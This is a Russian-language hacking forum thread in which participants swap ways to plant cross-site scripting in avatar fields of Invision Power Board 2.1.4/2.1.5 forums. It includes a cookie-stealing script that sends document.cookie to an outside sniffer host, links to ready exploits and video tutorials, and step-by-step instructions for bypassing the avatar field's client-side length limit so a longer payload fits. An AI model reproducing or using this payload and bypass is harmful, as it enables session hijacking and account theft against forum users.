Я же объяснил что работает только почему то на локалке

Он полюбому не пройдет... Читай весь топик! И внимательней!

<script>
img%20=%20new%20Image()%3B
img.src%20=%20%22http://адрес?%22%3F+document.cookie%3B
</script>

сорри, забыл перекодировать но и такое тож не прохордит

Этот код все равно не сработает. Т.к. ты не зашифровал еще много чего...

Вот мой рабочий
Если IPB 2.1.4 то вот:
http://dreamshell.h16.ru/hack/cookie_avatar_ipb.txt
Если IPB 2.1.5 то ставь как аватару, предварительно убрав [IMG]

эт как как аватару???

Вот кино, как в аватару xss вставить:
http://rapidshare.de/files/19344213/...vatar.rar.html

Ввобще-то я в этой теме уже выкладывал видео на примере DamageLab:
_http://dreamshell.h16.ru/hack/damagelab.rar

А как чтобы на снифер отсылало зделать, тамж ведь ограничение стоит на длину...

все просто...заходишь в свой профиль....--> сменить аватарку.....сохраняешь эту страницу у себя на компе....(файл сохранить как....)....открываешь эту страницу блокнотом....ближе к концу находишь надпись (по-русски) "Введите ссылку на файл Вашего аватара".....ниже видишь строчку.....maxLength=80.....вместо 80 делаешь 300, например, maxLength=300.....и сохраняешь файл....открываешь броузером и теперь у тебя стоит ограничение на 300 символов...

для прописи кода тебе хватит сполна....